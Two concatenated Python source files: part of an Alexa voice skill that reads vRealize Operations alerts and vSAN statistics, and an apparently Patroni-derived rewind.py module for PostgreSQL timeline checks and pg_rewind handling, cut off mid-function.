'resourceId': [session.attributes["CurrentObject"]]
},
'activeOnly': True
}
resourceAlerts = vropsRequest("api/alerts/query","POST",payload=alertsQueryPayload)
resourceName = resource["resourceKey"]["name"]
resourceHealth = resource["resourceHealth"]
resourceAlertCount = resourceAlerts["pageInfo"]["totalCount"]
outputSpeech = "The resource; {0}; is; {1}; for health status. There are {2} alerts associated with this resource. Shall I read those alerts?".format(resourceName, resourceHealth, resourceAlertCount)
with open("sessionData/"+session.sessionId+"resAlerts", 'w') as outfile:
json.dump(resourceAlerts, outfile)
session.attributes["ResAlertsIndex"] = 0
session.attributes["CurrentTree"] = "Resource"
return outputSpeech
#Called when user wants more information on an alert from the Resource tree
if session.attributes["CurrentTree"] == "Resource":
alert = vropsRequest("api/alerts/"+session.attributes["CurrentAlert"],"GET")
alertDef = vropsRequest("api/alertdefinitions/"+alert["alertDefinitionId"],"GET")
alertDesc = alertDef["description"]
recommendations=alertDef["states"][0]["recommendationPriorityMap"]
if (len(recommendations) == 1):
recQualifier = "only"
else:
recQualifier = "first"
recDesc = vropsRequest("api/recommendations/"+recommendations.keys()[0],"GET")
outputSpeech = "{0}. The {1} recommendation is as follows; {2}".format(alertDesc, recQualifier, recDesc["description"])
return outputSpeech
#Called when user wants more information on groups of alerts for a definition
if session.attributes["CurrentTree"] == "GroupedAlerts":
payload = json.loads('{"resourceId":'+ json.dumps(session.attributes["impactedResources"]) +'}')
resources = vropsRequest("api/resources/query","POST",payload=payload)
resourceList = resources["resourceList"]
resourceDict = {}
for res in resourceList:
resourceDict[res["resourceKey"]["name"]] = res["identifier"]
session.attributes["resourceDict"] = resourceDict
outputSpeech = ""
return outputSpeech
def continues():
if session.attributes["CurrentTree"] == "Alerts":
with open("sessionData/"+session.sessionId+"badgeAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
criticalAlerts = alerts_by_sev(alerts,"CRITICAL")
alert = criticalAlerts[session.attributes["AlertsIndex"]]
alertDefinition = alert["alertDefinitionName"]
resource = vropsRequest(alert["links"][1]["href"][10:] ,"GET")
resourceName = resource["resourceKey"]["name"]
if (len(criticalAlerts)-1 == session.attributes["AlertsIndex"]):
                outputSpeech = "The resource; {0}; has a critical alert, {1}. There are no more critical alerts. Would you like more information on this resource?".format(resourceName, alertDefinition)
else:
outputSpeech = "The resource; {0}; has a critical alert, {1}. Next alert or more information on this resource?".format(resourceName, alertDefinition)
session.attributes["AlertsIndex"] += 1
session.attributes["CurrentObject"] = resource["identifier"]
return outputSpeech
if session.attributes["CurrentTree"] == "GroupedAlerts":
with open("sessionData/"+session.sessionId+"groupAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
definition = alerts[session.attributes["AlertsIndex"]]
alertDefinition = definition[0]["alertDefinitionName"]
impactedResources = []
for res in definition:
impactedResources.append(res["resourceId"])
session.attributes["impactedResources"] = impactedResources
session.attributes["alertDefinition"] = alertDefinition
numOfResources = len(definition)
if numOfResources == 1:
resourceText = "resource is"
else:
resourceText = "resources are"
if (len(alerts)-1 == session.attributes["AlertsIndex"]):
outputSpeech = "For the alert: {0}, {1} {2} impacted. There are no more alerts. More information on this alert?".format(alertDefinition, numOfResources, resourceText)
else:
outputSpeech = "For the alert: {0}, {1} {2} impacted. Next or more info?".format(alertDefinition, numOfResources, resourceText)
session.attributes["AlertsIndex"] += 1
return outputSpeech
if session.attributes["CurrentTree"] == "Resource":
with open("sessionData/"+session.sessionId+"resAlerts", 'r') as alertsFile:
alerts = ""
alerts = json.load(alertsFile)
criticalAlerts = alerts_by_sev(alerts,"CRITICAL")
alert = criticalAlerts[session.attributes["ResAlertsIndex"]]
alertDefinition = alert["alertDefinitionName"]
resource = vropsRequest(alert["links"][1]["href"][10:] ,"GET")
resourceName = resource["resourceKey"]["name"]
if (len(criticalAlerts)-1 == session.attributes["ResAlertsIndex"]):
outputSpeech = "The resource; {0}; has a critical alert, {1}. There are no more alerts. Would you like more information on this alert?".format(resourceName, alertDefinition)
elif len(criticalAlerts) == 0:
outputSpeech = "Reading active alerts from newest to oldest. The resource; {0}; has a critical alert, {1}. Next alert or more information on this alert?".format(resourceName, alertDefinition)
session.attributes["ResAlertsIndex"] += 1
else:
outputSpeech = "The resource; {0}; has a critical alert, {1}. Next alert or more information on this alert?".format(resourceName, alertDefinition)
session.attributes["ResAlertsIndex"] += 1
session.attributes["CurrentAlert"] = alert["alertId"]
return outputSpeech
def on_element_select(token):
if session.attributes["CurrentTree"] == "GroupedAlerts":
resource = vropsRequest("api/resources/"+token,"GET")
resourceProps = vropsRequest("api/resources/"+token+"/properties","GET")
resourceLatest = vropsRequest("api/resources/"+token+"/stats/latest","GET")
if resource["resourceKey"]["resourceKindKey"] == "VirtualMachine":
#Build complete response Here
vmname = resource["resourceKey"]["name"]
guestOS = [d["value"] for d in resourceProps["property"] if d["name"]=="config|guestFullName"][0]
numCpu = [d["value"] for d in resourceProps["property"] if d["name"]=="config|hardware|numCpu"][0]
memKB = [d["value"] for d in resourceProps["property"] if d["name"]=="config|hardware|memoryKB"][0]
toolsStatus = [d["value"] for d in resourceProps["property"] if d["name"]=="summary|guest|toolsRunningStatus"][0]
toolsVersion = [d["value"] for d in resourceProps["property"] if d["name"]=="summary|guest|toolsVersion"][0]
#guestDiskPercent = [d["statKey"]["data"] for d in resourceLatest["values"]["stat-list"]["stat"] if d["statKey"]["key"]=="guestfilesystem|percentage_total"]
text = {
"secondaryText": {
"type": "RichText",
"text": "<br/><b>Number of vCPU: </b>" + numCpu + "<br/>" + \
"<b>Memory Allocation (KB): </b>" + memKB + "<br/>" + \
"<b>Guest OS Name: </b>" + guestOS + "<br/>" + \
"<b>Tools Status: </b>" + toolsStatus + "<br/>" + \
"<b>Tools Version: </b>" + toolsVersion + "<br/>"
#"<b>Guest Filesystem Used: </b>" + guestDiskPercent + "%%<br/>"
},
"primaryText": {
"type": "RichText",
"text": "<font size='3'>"+resource["resourceKey"]["name"]+"</font>"
}
}
fullResponse = question("Here are the " + resource["resourceKey"]["resourceKindKey"] + " details"). \
                display_render(title=resource["resourceKey"]["resourceKindKey"] + " details",template="BodyTemplate1",text=text,background_image_url=render_template('backgroundImageURL'),backButton='VISIBLE')
return fullResponse
def backout():
if session.attributes["CurrentTree"] == "Resource":
session.attributes["CurrentTree"] = "Alerts"
outputSpeech = "Returning to Critical Alerts list."
elif session.attributes["CurrentTree"] == "GroupedAlerts":
session.attributes["CurrentTree"] = ""
outputSpeech = "I am waiting for your query"
elif session.attributes["CurrentTree"] == "Alerts":
sessionCleanup()
session.attributes["CurrentTree"] = ""
outputSpeech = "I am waiting for your query"
else:
sessionCleanup()
outputSpeech = "I am waiting for your query"
return outputSpeech
def interactive_resp(data):
if session.attributes["CurrentTree"] == "GroupedAlerts":
listItems = []
resDict = session.attributes["resourceDict"]
for res in resDict:
listItem = {
"token":resDict[res],
"textContent": {
"primaryText": {
"text":res,
"type":"PlainText"
}
}
}
listItems.append(listItem)
        enhancedResponse = question("Here are the impacted objects.").list_display_render(template="ListTemplate1", title="Impacted Objects", backButton="VISIBLE", token=None, \
            background_image_url=render_template('backgroundImageURL'), listItems=listItems)
return enhancedResponse
def liGetToken(user=liusername, passwd=lipassword, authSource=liprovider):
url = "https://" + liHost + "/api/v1/sessions"
payload = "{\n \"provider\":\"" + liprovider + "\",\n \"username\":\"" + liusername + "\",\n \"password\":\"" + lipassword + "\"\n}"
headers = {
'accept': "application/json",
'content-type': "application/json"
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
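# vropsGetToken (below) caches the module-level bearer token: it acquires a fresh token
# when none is cached, probes /suite-api/api/versions once the stored validity timestamp
# has passed and re-acquires on a 401, and otherwise returns the cached token unchanged.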
def vropsGetToken(user=vropsuser, passwd=vropspassword, authSource=vropsauthsource, host=vropsHost):
if not bearertoken:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + vropsuser + "\",\r\n \"authSource\" : \"" + vropsauthsource + "\",\r\n \"password\" : \"" + vropspassword + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
elif int(bearertoken["validity"])/1000 < time.time():
url = "https://" + host + "/suite-api/api/versions"
headers = {
'authorization': "vRealizeOpsToken " + bearertoken["token"],
'accept': "application/json"
}
response = requests.request("GET", url, headers=headers, verify=verify)
if response.status_code == 401:
url = "https://" + host + "/suite-api/api/auth/token/acquire"
payload = "{\r\n \"username\" : \"" + vropsuser + "\",\r\n \"authSource\" : \"" + vropsauthsource + "\",\r\n \"password\" : \"" + vropspassword + "\",\r\n \"others\" : [ ],\r\n \"otherAttributes\" : {\r\n }\r\n}"
headers = {
'accept': "application/json",
'content-type': "application/json",
}
response = requests.request("POST", url, data=payload, headers=headers, verify=verify)
return response.text
else:
return json.dumps(bearertoken)
else:
return json.dumps(bearertoken)
def loginsightQuery(constraints,params,token):
url = "https://" + liHost + "/api/v1/aggregated-events/" + constraints + "?" + params
headers = {
'authorization': 'Bearer ' + token
}
response = requests.request('GET', url, headers=headers, verify=verify)
return response.text
def vropsRequest(request,method,querystring="",payload=""):
global bearertoken
bearertoken = json.loads(vropsGetToken())
url = "https://" + vropsHost + "/suite-api/" + request
querystring = querystring
headers = {
'authorization': "vRealizeOpsToken " + bearertoken["token"],
'accept': "application/json",
'content-type': "application/json"
}
if (querystring != "") and (payload != ""):
response = requests.request(method, url, headers=headers, params=querystring, json=payload, verify=verify)
elif (querystring != ""):
response = requests.request(method, url, headers=headers, params=querystring, verify=verify)
elif (payload != ""):
response = requests.request(method, url, headers=headers, json=payload, verify=verify)
else:
response = requests.request(method, url, headers=headers, verify=verify)
print ("Request " + response.url + " returned status " + str(response.status_code))
print payload
return response.json()
def translate_resource_intent(resource):
resString = ""
vropsResKindString = {
'bms':'virtualmachine',
'bm':'virtualmachine',
'vms':'virtualmachine',
'vm':'virtualmachine',
'hosts': 'hostsystem',
'host': 'hostsystem',
'clusters': 'clustercomputeresource',
'cluster': 'clustercomputeresource',
'datastores': 'datastore',
'datastore': 'datastore'
}
# if intent['slots']['resource']['value'] in vropsResKindString:
resString = vropsResKindString.get(resource.lower())
return resString
def speechify_resource_intent(resource,plurality):
vocalString = ""
vocalStrings = {
'bm':'virtual machine',
'vm':'virtual machine',
'host': 'host system',
'cluster': 'cluster',
'datastore': 'data store',
'bms':'virtual machine',
'vms':'virtual machine',
'hosts': 'host system',
'clusters': 'cluster',
'datastores': 'data store'
}
if plurality:
vocalString = vocalStrings.get(resource.lower()) + "s"
else:
vocalString = vocalStrings.get(resource.lower())
return vocalString
def alerts_by_sev(alerts,sev):
filteredAlerts = []
if any(x == sev for x in ["INFO","WARNING","IMMEDIATE","CRITICAL"]):
for alert in alerts["alerts"]:
if alert["alertLevel"] == sev:
filteredAlerts.append(alert)
return filteredAlerts
def group_alerts_by_def(alerts,groupkey):
sortedAlerts = sorted(alerts, key=itemgetter(groupkey))
groupedAlerts = []
for key, items in groupby(sortedAlerts, itemgetter(groupkey)):
groupedAlerts.append(list(items))
return groupedAlerts
def sessionCleanup():
dir = "sessionData"
files = os.listdir(dir)
for file in files:
if file.startswith(session.sessionId):
os.remove(os.path.join(dir,file))
#####################################################
# Invocations
#####################################################
@ask.launch
def welcome_msg():
welcome_msg = render_template('welcome')
textContent = {
'primaryText': {
'text':'<font size="3">Intelligent Operations</font>',
'type':'RichText'
}
}
if (context.System.device.supportedInterfaces.Display):
return question(welcome_msg).display_render(
title='Welcome to vRealize Operations',template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'),image=render_template('vrops340x340ImageURL'), \
hintText="Get Critical VM alerts")
else:
return question(welcome_msg)
@ask.intent('AMAZON.YesIntent')
def yesIntent():
outputSpeech = continues()
textContent = {
'primaryText': {
'text':"<font size='3'>"+outputSpeech+"</font>",
'type':'RichText'
}
}
title = 'Welcome to vRealize Operations'
image = ""
if (session.attributes["CurrentTree"] == "GroupedAlerts"):
title = "Alerts by Definition"
image = render_template('alert' + session.attributes['groupCriticality'] + 'ImageURL')
if (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title=title,template="BodyTemplate1",text=textContent,background_image_url=render_template('backgroundImageURL'),image=image)
else:
return question(outputSpeech)
@ask.intent('AMAZON.NextIntent')
def nextIntent():
outputSpeech = continues()
textContent = {
'primaryText': {
'text':"<font size='3'>"+outputSpeech+"</font>",
'type':'RichText'
}
}
title = 'Welcome to vRealize Operations'
image = ""
if (session.attributes["CurrentTree"] == "GroupedAlerts"):
title = "Alerts by Definition"
image = render_template('alert' + session.attributes['groupCriticality'] + 'ImageURL')
if (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title=title,template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'),image=image)
else:
return question(outputSpeech)
@ask.intent('MoreInformationIntent')
def MoreInformationIntent():
outputSpeech = more_info()
textContent = {
'primaryText': {
'text':outputSpeech,
'type':'PlainText'
}
}
if ((session.attributes["CurrentTree"] == "GroupedAlerts") and (context.System.device.supportedInterfaces.Display)):
enhancedResponse = interactive_resp(outputSpeech)
return enhancedResponse
elif (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title='Welcome to vRealize Operations',template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'))
else:
if (session.attributes["CurrentTree"]):
return question(outputSpeech)
else:
return question("I'm sorry, I don't understand your request")
@ask.intent('AMAZON.NoIntent')
def noIntent():
outputSpeech = backout()
textContent = {
'primaryText': {
'text':'Intelligent Operations',
'type':'PlainText'
}
}
if (context.System.device.supportedInterfaces.Display):
return question(outputSpeech).display_render(
title='Welcome to vRealize Operations',template="BodyTemplate2",text=textContent,background_image_url=render_template('backgroundImageURL'))
else:
return question(outputSpeech)
@ask.intent('AMAZON.CancelIntent')
def cancelIntent():
outputSpeech = backout()
return question(outputSpeech)
@ask.intent('vSANStatusIntent')
def vsanstatus():
#build query Parameters
vsanworld_res = vropsRequest("api/resources","GET",querystring="resourceKind=vSAN World")
vsan_res_id = vsanworld_res["resourceList"][0]["identifier"]
begin = int(round(time.time()*1000-21600000))
end = int(round(time.time()*1000))
querystring = {"begin":begin,"end":end,"rollUpType":"AVG","intervalQuantifier":"7", \
"intervalType":"HOURS",\
"statKey": [ "summary|total_latency", \
"summary|total_iops", \
"summary|total_number_vms", \
"summary|total_cluster_count", \
"summary|vsan_diskspace_capacity", \
"summary|vsan_diskspace_capacity_used", \
"summary|remaining_capacity" ], \
"resourceId":vsan_res_id, }
#execute query and process
response = vropsRequest("api/resources/stats","GET",querystring)
#building response
stats_dict = dict()
for statitem in response["values"][0]["stat-list"]["stat"]:
stat_key = statitem["statKey"]["key"].split("|")[1].replace("_"," ").title()
if (stat_key.find("Cluster Count") != -1):
stat_key = "Number of Clusters"
if (stat_key.find("Capacity") != -1):
stat_key = stat_key + " in TB"
if (stat_key.find("Vsan") != -1):
stat_key = stat_key.replace("Vsan","")
if (stat_key.find("Total") != -1):
stat_key = stat_key.replace("Total","Average")
if (stat_key.find("Iops") != -1):
stat_key = stat_key.replace("Iops","IOPS")
if (stat_key.find("Vms") != -1):
stat_key = stat_key.replace("Vms","of VMs")
stat_key = stat_key.replace("Average","")
stats_dict[stat_key] = str(int(statitem["data"][0]))
#TODO add ordering to display so items appear in some logical ordering
secondaryText = "<br/>"
    for key, value in sorted(stats_dict.items(), key=lambda kv: (kv[1], kv[0])):
secondaryText = secondaryText + "<b> %s:</b> %s <br/>" %(key,value)
secondaryText = secondaryText + "<br/>"
text = {
"tertiaryText": {
"type":"RichText",
"text":"6 hour average statistics shown."
},
"secondaryText": {
"type": "RichText",
"text": secondaryText
},
"primaryText": {
"type": "RichText",
"text": "<b><font size='7'>vSAN Status</font></b>"
}
}
enhancedResponse = question("v SAN Status Report.").display_render(template="BodyTemplate2", title="Datacenter Operations", text=text,backButton="VISIBILE", token=None, \
background_image_url=render_template('backgroundImageURL'),image=render_template('vsan340x340ImageURL'))
return enhancedResponse
@ask.intent('DataCenterCapacityIntent')
def dccapacity():
return question("Data Center Capacity Report")
@ask.intent('DataCenterActivityIntent')
#Runs several Log Insight and vROps queries to build a report for echo show
#TODO Make sure to add device checking and optimize for echo voice only
def dcactivity():
secondaryText = "<br/>"
with open("prefetch/dcreport", 'r') as dcreport:
report_data = json.load(dcreport)
    for metric, value in report_data.items():
item = "<b>Number of " + metric + ": </b>"
if not (value["bins"]):
item = item + "None"
else:
item = item + str(value["bins"][0]["value"])
secondaryText = secondaryText + item + "<br/>"
text = {
"secondaryText": {
"type": "RichText",
"text": secondaryText
},
"primaryText": {
"type": "RichText",
"text": "<font size='5'>Datacenter Activity Past 24 Hours</font>"
}
}
enhancedResponse = question("Datacenter Activity in the Past 24 Hours.").display_render(template="BodyTemplate2", title="Datacenter Operations", text=text,backButton="VISIBILE", token=None, \
background_image_url=render_template('backgroundImageURL'), image=render_template('vsphere340x340ImageURL'))
return enhancedResponse
@ask.intent('GroupAlertsIntent')
#Starts a tree to read active alerts grouped by alert definition for the stated resource kind
#and criticality. Alert definitions are read by group with option list individual alerts in a group
def group_criticality_alerts(criticality, resource):
request = "api/alerts/query"
method = "POST"
payload = {
'resource-query': {
'resourceKind': [translate_resource_intent(resource)]
},
'activeOnly': True,
'alertCriticality': [criticality.upper()]
}
session.attributes["groupCriticality"] = criticality
alerts = vropsRequest(request,method,payload=payload)
numAllAlerts = str(alerts["pageInfo"]["totalCount"])
speech_output = "There are " + numAllAlerts + " " + criticality + " alerts for monitored " + speechify_resource_intent(resource,1) + ". " + \
"Shall I read the alerts by alert definition?"
textContent = {
'primaryText': {
'text': "<font size='7'>" + speech_output + "</font>",
'type':'RichText'
}
}
groupedAlerts = []
groupedAlerts = group_alerts_by_def(alerts['alerts'],'alertDefinitionId')
with open("sessionData/"+session.sessionId+"groupAlerts", 'w') as outfile:
json.dump(groupedAlerts, outfile)
session.attributes["AlertsIndex"] = 0
session.attributes["CurrentTree"] = "GroupedAlerts"
title = "Total " + criticality + " alerts for " + speechify_resource_intent(resource,1) + "."
return question(speech_output).display_render(
title=title,template="BodyTemplate1",text=textContent,background_image_url=render_template('backgroundImageURL',image="alertcriticalImageURL"))
@ask.intent('ListBadgeAlertsIntent')
#Starts a tree to read active alerts for the stated resource kind for a major badge.
#Alerts are read individually with option for more info depth for a resource
def list_badge_alerts(badge, resource):
request = "api/alerts/query"
method = "POST"
payload = {
'resource-query': {
'resourceKind': [translate_resource_intent(resource)]
},
'activeOnly': True,
'alertCriticality': ["CRITICAL","IMMEDIATE","WARNING","INFORMATION"],
'alertImpact': [badge]
}
alerts = vropsRequest(request,method,payload=payload)
numAllAlerts = str(alerts["pageInfo"]["totalCount"])
numImmediateAlerts = str(len(alerts_by_sev(alerts,"IMMEDIATE")))
numCriticalAlerts = str(len(alerts_by_sev(alerts,"CRITICAL")))
speech_output = "There are " + numAllAlerts + " " + badge + " alerts for monitored " + speechify_resource_intent(resource,1) + ". " + \
"Of those " + numCriticalAlerts + " are critical and " + numImmediateAlerts + " are immediate. Shall I read the critical alerts?"
textContent = {
'primaryText': {
'text': "<font size='3'>" + speech_output + "</font>",
'type':'RichText'
}
}
with open("sessionData/"+session.sessionId+"badgeAlerts", 'w') as outfile:
json.dump(alerts, outfile)
session.attributes["AlertsIndex"] = 0
session.attributes["CurrentTree"] = "Alerts"
if (context.System.device.supportedInterfaces.Display):
return question(speech_output).display_render(
title='Welcome to vRealize Operations',text=textContent,background_image_url=render_template('backgroundImageURL'))
else:
return question(speech_output)
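# Handle touch selection of a display element by dispatching on the selected item's token.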
@ask.display_element_selected
def element():
fullResponse = on_element_select(request["token"])
return fullResponse
@ask.intent('getAlertsIntent')
@ask.intent('getOverallStatus')
@ask.intent('goodbyeIntent')
def goodbye_msg():
goodbye_msg = render_template('goodbye')
logging.debug("Session Ended")
sessionCleanup()
return statement(goodbye_msg)
@ask.session_ended
def session_ended():
logging.debug("Session Ended")
sessionCleanup()
return "", 200
if __name__ == '__main__':
bearertoken = json.loads(vropsGetToken())
background_thread = Thread(target=datacenter_report)
background_thread.daemon = True
background_thread.start()
app.run(debug=True)
|
rewind.py
|
import logging
import os
import shlex
import six
import subprocess
from threading import Lock, Thread
from .connection import get_connection_cursor
from .misc import format_lsn, parse_history, parse_lsn
from ..async_executor import CriticalTask
from ..dcs import Leader
logger = logging.getLogger(__name__)
REWIND_STATUS = type('Enum', (), {'INITIAL': 0, 'CHECKPOINT': 1, 'CHECK': 2, 'NEED': 3,
'NOT_NEED': 4, 'SUCCESS': 5, 'FAILED': 6})
class Rewind(object):
def __init__(self, postgresql):
self._postgresql = postgresql
self._checkpoint_task_lock = Lock()
self.reset_state()
@staticmethod
def configuration_allows_rewind(data):
return data.get('wal_log_hints setting', 'off') == 'on' or data.get('Data page checksum version', '0') != '0'
@property
def can_rewind(self):
""" check if pg_rewind executable is there and that pg_controldata indicates
we have either wal_log_hints or checksums turned on
"""
# low-hanging fruit: check if pg_rewind configuration is there
if not self._postgresql.config.get('use_pg_rewind'):
return False
cmd = [self._postgresql.pgcommand('pg_rewind'), '--help']
try:
ret = subprocess.call(cmd, stdout=open(os.devnull, 'w'), stderr=subprocess.STDOUT)
if ret != 0: # pg_rewind is not there, close up the shop and go home
return False
except OSError:
return False
return self.configuration_allows_rewind(self._postgresql.controldata())
@property
def can_rewind_or_reinitialize_allowed(self):
return self._postgresql.config.get('remove_data_directory_on_diverged_timelines') or self.can_rewind
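    # Schedule a divergence check on the next cycle unless a rewind is already known to be needed.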
def trigger_check_diverged_lsn(self):
if self.can_rewind_or_reinitialize_allowed and self._state != REWIND_STATUS.NEED:
self._state = REWIND_STATUS.CHECK
@staticmethod
def check_leader_is_not_in_recovery(conn_kwargs):
try:
with get_connection_cursor(connect_timeout=3, options='-c statement_timeout=2000', **conn_kwargs) as cur:
cur.execute('SELECT pg_catalog.pg_is_in_recovery()')
if not cur.fetchone()[0]:
return True
logger.info('Leader is still in_recovery and therefore can\'t be used for rewind')
except Exception:
return logger.exception('Exception when working with leader')
@staticmethod
def check_leader_has_run_checkpoint(conn_kwargs):
try:
with get_connection_cursor(connect_timeout=3, options='-c statement_timeout=2000', **conn_kwargs) as cur:
cur.execute("SELECT NOT pg_catalog.pg_is_in_recovery()" +
" AND ('x' || pg_catalog.substr(pg_catalog.pg_walfile_name(" +
" pg_catalog.pg_current_wal_lsn()), 1, 8))::bit(32)::int = timeline_id" +
" FROM pg_catalog.pg_control_checkpoint()")
if not cur.fetchone()[0]:
return 'leader has not run a checkpoint yet'
except Exception:
logger.exception('Exception when working with leader')
            return 'not accessible or not healthy'
def _get_checkpoint_end(self, timeline, lsn):
"""The checkpoint record size in WAL depends on postgres major version and platform (memory alignment).
        Hence, the only reliable way to figure out where it ends is to read the record from the file with the help of pg_waldump
and parse the output. We are trying to read two records, and expect that it will fail to read the second one:
`pg_waldump: fatal: error in WAL record at 0/182E220: invalid record length at 0/182E298: wanted 24, got 0`
The error message contains information about LSN of the next record, which is exactly where checkpoint ends."""
lsn8 = format_lsn(lsn, True)
lsn = format_lsn(lsn)
out, err = self._postgresql.waldump(timeline, lsn, 2)
if out is not None and err is not None:
out = out.decode('utf-8').rstrip().split('\n')
err = err.decode('utf-8').rstrip().split('\n')
pattern = 'error in WAL record at {0}: invalid record length at '.format(lsn)
if len(out) == 1 and len(err) == 1 and ', lsn: {0}, prev '.format(lsn8) in out[0] and pattern in err[0]:
i = err[0].find(pattern) + len(pattern)
j = err[0].find(": wanted ", i)
if j > -1:
try:
return parse_lsn(err[0][i:j])
except Exception as e:
logger.error('Failed to parse lsn %s: %r', err[0][i:j], e)
logger.error('Failed to parse pg_%sdump output', self._postgresql.wal_name)
logger.error(' stdout=%s', '\n'.join(out))
logger.error(' stderr=%s', '\n'.join(err))
return 0
def _get_local_timeline_lsn_from_controldata(self):
in_recovery = timeline = lsn = None
data = self._postgresql.controldata()
try:
if data.get('Database cluster state') in ('shut down in recovery', 'in archive recovery'):
in_recovery = True
lsn = data.get('Minimum recovery ending location')
timeline = int(data.get("Min recovery ending loc's timeline"))
if lsn == '0/0' or timeline == 0: # it was a master when it crashed
data['Database cluster state'] = 'shut down'
if data.get('Database cluster state') == 'shut down':
in_recovery = False
lsn = data.get('Latest checkpoint location')
timeline = int(data.get("Latest checkpoint's TimeLineID"))
except (TypeError, ValueError):
logger.exception('Failed to get local timeline and lsn from pg_controldata output')
if lsn is not None:
try:
lsn = parse_lsn(lsn)
except (IndexError, ValueError) as e:
logger.error('Exception when parsing lsn %s: %r', lsn, e)
lsn = None
return in_recovery, timeline, lsn
def _get_local_timeline_lsn(self):
if self._postgresql.is_running(): # if postgres is running - get timeline from replication connection
in_recovery = True
timeline = self._postgresql.received_timeline() or self._postgresql.get_replica_timeline()
lsn = self._postgresql.replayed_location()
else: # otherwise analyze pg_controldata output
in_recovery, timeline, lsn = self._get_local_timeline_lsn_from_controldata()
log_lsn = format_lsn(lsn) if isinstance(lsn, six.integer_types) else lsn
logger.info('Local timeline=%s lsn=%s', timeline, log_lsn)
return in_recovery, timeline, lsn
@staticmethod
def _log_master_history(history, i):
start = max(0, i - 3)
end = None if i + 4 >= len(history) else i + 2
history_show = []
def format_history_line(line):
return '{0}\t{1}\t{2}'.format(line[0], format_lsn(line[1]), line[2])
for line in history[start:end]:
history_show.append(format_history_line(line))
if line != history[-1]:
history_show.append('...')
history_show.append(format_history_line(history[-1]))
logger.info('master: history=%s', '\n'.join(history_show))
def _conn_kwargs(self, member, auth):
ret = member.conn_kwargs(auth)
if not ret.get('dbname'):
ret['dbname'] = self._postgresql.database
# Add target_session_attrs in case more than one hostname is specified
# (libpq client-side failover) making sure we hit the primary
if 'target_session_attrs' not in ret and self._postgresql.major_version >= 100000:
ret['target_session_attrs'] = 'read-write'
return ret
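    # Compare the local timeline/LSN with the leader's timeline history to decide whether pg_rewind is needed.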
def _check_timeline_and_lsn(self, leader):
in_recovery, local_timeline, local_lsn = self._get_local_timeline_lsn()
if local_timeline is None or local_lsn is None:
return
if isinstance(leader, Leader) and leader.member.data.get('role') != 'master':
return
if not self.check_leader_is_not_in_recovery(
self._conn_kwargs(leader, self._postgresql.config.replication)):
return
history = need_rewind = None
try:
with self._postgresql.get_replication_connection_cursor(**leader.conn_kwargs()) as cur:
cur.execute('IDENTIFY_SYSTEM')
master_timeline = cur.fetchone()[1]
logger.info('master_timeline=%s', master_timeline)
if local_timeline > master_timeline: # Not always supported by pg_rewind
need_rewind = True
elif local_timeline == master_timeline:
need_rewind = False
elif master_timeline > 1:
cur.execute('TIMELINE_HISTORY {0}'.format(master_timeline))
history = cur.fetchone()[1]
if not isinstance(history, six.string_types):
history = bytes(history).decode('utf-8')
logger.debug('master: history=%s', history)
except Exception:
return logger.exception('Exception when working with master via replication connection')
if history is not None:
history = list(parse_history(history))
for i, (parent_timeline, switchpoint, _) in enumerate(history):
if parent_timeline == local_timeline:
# We don't need to rewind when:
# 1. for replica: replayed location is not ahead of switchpoint
# 2. for the former primary: end of checkpoint record is the same as switchpoint
if in_recovery:
need_rewind = local_lsn > switchpoint
elif local_lsn >= switchpoint:
need_rewind = True
else:
need_rewind = switchpoint != self._get_checkpoint_end(local_timeline, local_lsn)
break
elif parent_timeline > local_timeline:
need_rewind = True
break
else:
need_rewind = True
self._log_master_history(history, i)
self._state = need_rewind and REWIND_STATUS.NEED or REWIND_STATUS.NOT_NEED
def rewind_or_reinitialize_needed_and_possible(self, leader):
if leader and leader.name != self._postgresql.name and leader.conn_url and self._state == REWIND_STATUS.CHECK:
self._check_timeline_and_lsn(leader)
return leader and leader.conn_url and self._state == REWIND_STATUS.NEED
def __checkpoint(self, task, wakeup):
try:
result = self._postgresql.checkpoint()
except Exception as e:
result = 'Exception: ' + str(e)
with task:
task.complete(not bool(result))
if task.result:
wakeup()
def ensure_checkpoint_after_promote(self, wakeup):
"""After promote issue a CHECKPOINT from a new thread and asynchronously check the result.
In case if CHECKPOINT failed, just check that timeline in pg_control was updated."""
if self._state == REWIND_STATUS.INITIAL and self._postgresql.is_leader():
with self._checkpoint_task_lock:
if self._checkpoint_task:
with self._checkpoint_task:
if self._checkpoint_task.result is not None:
self._state = REWIND_STATUS.CHECKPOINT
self._checkpoint_task = None
elif self._postgresql.get_master_timeline() == self._postgresql.pg_control_timeline():
self._state = REWIND_STATUS.CHECKPOINT
else:
self._checkpoint_task = CriticalTask()
Thread(target=self.__checkpoint, args=(self._checkpoint_task, wakeup)).start()
def checkpoint_after_promote(self):
return self._state == REWIND_STATUS.CHECKPOINT
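    # Expand the %-placeholders in restore_command and run it to fetch a single missing WAL segment.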
def _fetch_missing_wal(self, restore_command, wal_filename):
cmd = ''
length = len(restore_command)
i = 0
while i < length:
if restore_command[i] == '%' and i + 1 < length:
i += 1
if restore_command[i] == 'p':
cmd += os.path.join(self._postgresql.wal_dir, wal_filename)
elif restore_command[i] == 'f':
cmd += wal_filename
elif restore_command[i] == 'r':
cmd += '000000010000000000000001'
elif restore_command[i] == '%':
cmd += '%'
else:
cmd += '%'
i -= 1
else:
cmd += restore_command[i]
i += 1
logger.info('Trying to fetch the missing wal: %s', cmd)
return self._postgresql.cancellable.call(shlex.split(cmd)) == 0
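    # Scan pg_rewind output for a "could not open file" error and return the name of the missing WAL segment.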
def _find_missing_wal(self, data):
# could not open file "$PGDATA/pg_wal/0000000A00006AA100000068": No such file or directory
pattern = 'could not open file "'
for line in data.decode('utf-8').split('\n'):
b = line.find(pattern)
if b > -1:
b += len(pattern)
e = line.find('": ', b)
if e > -1 and '/' in line[b:e]:
